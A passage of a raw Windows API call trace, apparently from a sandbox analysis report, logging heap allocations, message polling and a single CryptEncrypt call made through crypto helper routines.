Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x12b4b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x12b50) returned 1 [0263.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0263.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.720] CharLowerBuffW (in: lpsz="byte[76624]", cchLength=0xb | out: lpsz="byte[76624]") returned 0xb [0263.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0263.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0263.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b50) returned 0xe50048 [0263.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0263.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0263.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0263.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0263.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0263.727] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.727] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.727] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.739] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0263.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51e68 [0263.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0263.739] CryptEncrypt (in: hKey=0xa870d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe50048*, pdwDataLen=0x8cef60*=0x12b4b, dwBufLen=0x12b50 | out: pbData=0xe50048*, pdwDataLen=0x8cef60*=0x12b50) returned 1 [0263.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0263.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0263.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55238 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0263.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0263.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0263.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0263.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0263.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0263.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0263.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0263.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b50) returned 0xe62ba0 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b50) returned 0xe756f8 [0263.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe62ba0 | out: hHeap=0x970000) returned 1 [0263.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0263.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.747] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.747] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.747] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.747] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.747] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0263.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0263.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0263.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0263.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0263.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0263.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0263.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0263.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0263.765] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.765] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0263.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.765] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0263.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0263.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.765] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0263.766] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0263.766] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b50) returned 0xe62ba0 [0263.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b50) returned 0xe88250 [0263.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe62ba0 | out: hHeap=0x970000) returned 1 [0263.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b50) returned 0xe62ba0 